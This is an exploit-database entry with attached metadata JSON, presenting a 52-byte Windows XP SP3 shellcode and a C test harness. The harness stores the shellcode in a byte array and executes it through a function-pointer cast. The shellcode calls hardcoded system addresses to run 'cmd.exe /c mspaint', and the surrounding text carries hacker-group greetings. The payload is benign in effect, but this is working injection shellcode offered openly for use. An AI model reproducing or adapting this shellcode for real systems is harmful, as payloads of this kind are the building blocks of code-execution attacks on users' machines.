ID 1337DAY-ID-15976
Type zdt
Reporter ^Xecuti0N3r
Modified 2011-04-28T00:00:00
Description
Exploit for win32 platform in category shellcode
#(+) Exploit Title: win32/xp sp3 MSPaint Shellcode 52 Bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm ^Xecuti0n3r member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Code:
____________________________________________________________________________________________________
____________________________________________________________________________________________________
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x35\x53\xbb\xad\x23\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6d\x73\x70\x61\x69\x6e\x74";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
____________________________________________________________________________________________________
########################################################################
(+)Exploit Coded by: ^Xecuti0N3r
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
(+)Gr33ts to : Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) + All the 31337 Members :)
(+)<3 to :Indian Cyber Army & Indishell Crew
########################################################################
# 0day.today [2018-01-03] #
{"id": "1337DAY-ID-15976", "lastseen": "2018-01-03T15:23:45", "viewCount": 3, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 3.2, "vector": "NONE", "modified": "2018-01-03T15:23:45", "rev": 2}, "dependencies": {"references": [{"type": "exploitpack", "idList": ["EXPLOITPACK:F778AD5D626855F4BE149B4B8F57874E", "EXPLOITPACK:49DF828953E7241C68E147C1B59EE318"]}, {"type": "exploitdb", "idList": ["EDB-ID:43083", "EDB-ID:48019"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156239"]}, {"type": "zdt", "idList": ["1337DAY-ID-798", "1337DAY-ID-3604", "1337DAY-ID-33920", "1337DAY-ID-28913"]}, {"type": "threatpost", "idList": ["THREATPOST:E95FF75420C541DF65D4D795CF73B5CE", "THREATPOST:C4650E22534F775312B3885DAA306DDA", "THREATPOST:525BDFF0E0C4D33D5E543DA8234EA30B", "THREATPOST:62D348CF6DAF40D6FBCD313A3BCEDBF9"]}, {"type": "talosblog", "idList": ["TALOSBLOG:02A78D6B13F66FBEAB2455A025752712"]}, {"type": "nessus", "idList": ["CISCO-SA-20200102-DCNM.NASL"]}, {"type": "cve", "idList": ["CVE-2017-15976", "CVE-2019-15976"]}], "modified": "2018-01-03T15:23:45", "rev": 2}, "vulnersScore": 3.2}, "type": "zdt", "sourceHref": "https://0day.today/exploit/15976", "description": "Exploit for win32 platform in category shellcode", "title": "win32/xp sp3 MSPaint Shellcode 52 Bytes", "cvelist": [], "sourceData": "#(+) Exploit Title: win32/xp sp3 MSPaint Shellcode 52 Bytes\r\n#(+) Author : ^Xecuti0n3r\r\n#(+) E-mail : xecuti0n3r()yahoo.com\r\n#(+) Category : win32-Shellcodes\r\n#(+) Tested on : Windows Xp 32 bit\r\n\r\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : 1337day.com 0\r\n1 [+] Support e-mail : submit[at]1337day.com 1\r\n0 0\r\n1 ######################################### 1\r\n0 I'm ^Xecuti0n3r member from Inj3ct0r Team 1\r\n1 ######################################### 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\n\r\nCode:\r\n____________________________________________________________________________________________________\r\n____________________________________________________________________________________________________\r\n\r\n#include <string.h>\r\n#include <stdlib.h>\r\n\r\nint main(){\r\n\r\n unsigned char shellcode[]=\r\n \"\\xeb\\x1b\\x5b\\x31\\xc0\\x50\\x31\\xc0\\x88\\x43\\x35\\x53\\xbb\\xad\\x23\\x86\\x7c\"\r\n \"\\xff\\xd3\\x31\\xc0\\x50\\xbb\\xfa\\xca\\x81\\x7c\\xff\\xd3\\xe8\\xe0\\xff\\xff\\xff\"\r\n \"\\x63\\x6d\\x64\\x2e\\x65\\x78\\x65\\x20\\x2f\\x63\\x20\\x6d\\x73\\x70\\x61\\x69\\x6e\\x74\";\r\n\r\n\r\n printf(\"Size = %d bytes\\n\", strlen(shellcode));\r\n\r\n ((void (*)())shellcode)();\r\n\r\n return 0;\r\n}\r\n\r\n____________________________________________________________________________________________________\r\n\r\n########################################################################\r\n(+)Exploit Coded by: ^Xecuti0N3r \r\n(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r\r\n(+)Gr33ts to : Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) + All the 31337 Members :)\r\n(+)<3 to :Indian Cyber Army & Indishell Crew\r\n########################################################################\r\n\r\n\n\n# 0day.today [2018-01-03] #", "published": "2011-04-28T00:00:00", "references": [], "reporter": "^Xecuti0N3r", "modified": "2011-04-28T00:00:00", "href": "https://0day.today/exploit/description/15976"}
{}